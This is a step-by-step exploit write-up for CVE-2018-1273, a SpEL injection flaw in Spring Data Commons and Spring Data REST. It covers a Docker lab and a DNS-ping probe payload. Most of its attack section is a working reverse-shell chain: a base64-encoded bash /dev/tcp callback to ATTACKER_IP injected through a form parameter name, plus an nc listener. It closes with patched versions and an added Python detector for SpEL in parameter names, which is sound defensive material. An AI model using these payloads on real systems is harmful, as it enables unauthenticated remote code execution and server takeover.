- Vulnerability Overview
Spring Data is an open-source umbrella project that simplifies database access and offers cloud-native support.
Spring Data Commons provides shared infrastructure for all Spring Data modules.
In versions ≤ 2.0.5 (and ≤ 1.13.10), user input is passed unsanitized into a SpEL (Spring Expression Language) expression, allowing arbitrary code execution.
Affected Versions
• Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10)
• Spring Data REST 2.6 – 2.6.10 (Ingalls SR10)
• Spring Data Commons 2.0 – 2.0.5 (Kay SR5)
• Spring Data REST 3.0 – 3.0.5 (Kay SR5)
- Reproduction Environment
Docker image: https://github.com/laoa1573/vuldockerfile
Clone and run:
git clone https://github.com/laoa1573/vuldockerfile
cd vuldockerfile/CVE-2018-1273
docker build -t cve-2018-1273 .
docker run -p 8080:8080 cve-2018-1273
- Confirm the Vulnerability
- Browse to
http://localhost:8080/users
- Intercept the request (e.g., with Burp Suite).
- Replace the POST body with the following payload to trigger DNS interaction:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping carlhf.dnslog.cn")]=&password=&repeatedPassword=
• Server responds with HTTP 500.
• If your DNS log receives pings, command execution is verified.
- Obtaining a Reverse Shell
Runtime.exec() does not invoke a shell, so special characters (pipes, redirects) are not interpreted.
Use bash -c and Base64-encoded payloads to bypass quoting issues.
Step 1: Prepare your reverse-shell command
bash$IFS$9-i>&/dev/tcp/ATTACKER_IP/ATTACKER_PORT<&1
(where $IFS$9 is an IFS-based whitespace trick)
Step 2: Base64-encode the command
Visit http://www.jackson-t.ca/runtime-exec-payloads.html or use:
$ echo -n 'bash$IFS$9-i>&/dev/tcp/ATTACKER_IP/ATTACKER_PORT<&1' | base64
Example result:
YmFzaCRJRlMkOS1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQ8JjE=
Step 3: Final payload (Base64 inside Base64 to avoid double quotes)
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCRJRlMkOS1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQ8JjE=}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=
- Result
• Target connects back to your listener:
nc -lvnp 4444
You now have an unauthenticated remote shell as the user running the Spring application.
- Mitigation / Fix
Upgrade to at least:
• Spring Data Commons 2.0.6 / 1.13.11
• Spring Data REST 3.0.6 / 2.6.11
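Until the upgrade lands, requests can be triaged for the pattern every payload above shares: SpEL syntax inside the bracket segment of a form parameter name, which a legitimate property path such as addresses[0].street never contains. The following Python script is an added example written for this page, not code from the writeup or from Spring; the sample request bodies are constructed.

```python
import re
from urllib.parse import parse_qsl

# A legitimate Spring data-binding property path looks like "addresses[0].street"
# or "attrs[name]". A variable reference (#this), a type reference (T(...)) or a
# method call inside the brackets never occurs there, but every CVE-2018-1273
# payload needs one of them.
SPEL_IN_BRACKETS = re.compile(r"\[[^\]]*(#|\w\s*\()")

def suspicious_params(body: str) -> list:
    """Return the parameter names in a form-urlencoded body whose property path
    carries SpEL syntax. parse_qsl undoes URL-encoding first, so an encoded
    %5B%23 ("[#") is caught as well as the clear-text form."""
    return [name for name, _ in parse_qsl(body, keep_blank_values=True)
            if SPEL_IN_BRACKETS.search(name)]

def triage(requests: list) -> list:
    """Scan (request_id, body) pairs and report those with SpEL in a parameter
    name. Only bodies that reach MapDataBinder (POST/PUT/PATCH to a Spring Data
    REST endpoint) matter, so feed it those."""
    findings = []
    for req_id, body in requests:
        hits = suspicious_params(body)
        if hits:
            findings.append((req_id, hits))
    return findings

# Constructed sample bodies: two benign, one clear-text probe, one URL-encoded.
SAMPLE_REQUESTS = [
    ("r1", "username=alice&password=s3cret&repeatedPassword=s3cret"),
    ("r2", "addresses[0].street=Main+St&attrs[name]=x"),
    ("r3", 'username[#this.getClass().forName("java.lang.Runtime")]=&password='),
    ("r4", "username%5B%23this.getClass%28%29%5D=&password="),
]

if __name__ == "__main__":
    for req_id, hits in triage(SAMPLE_REQUESTS):
        print(req_id, "->", hits)
```

Feeding the same check with decoded request bodies from a WAF or reverse-proxy log gives a retrospective view of probes that already hit the HTTP 500 path described above.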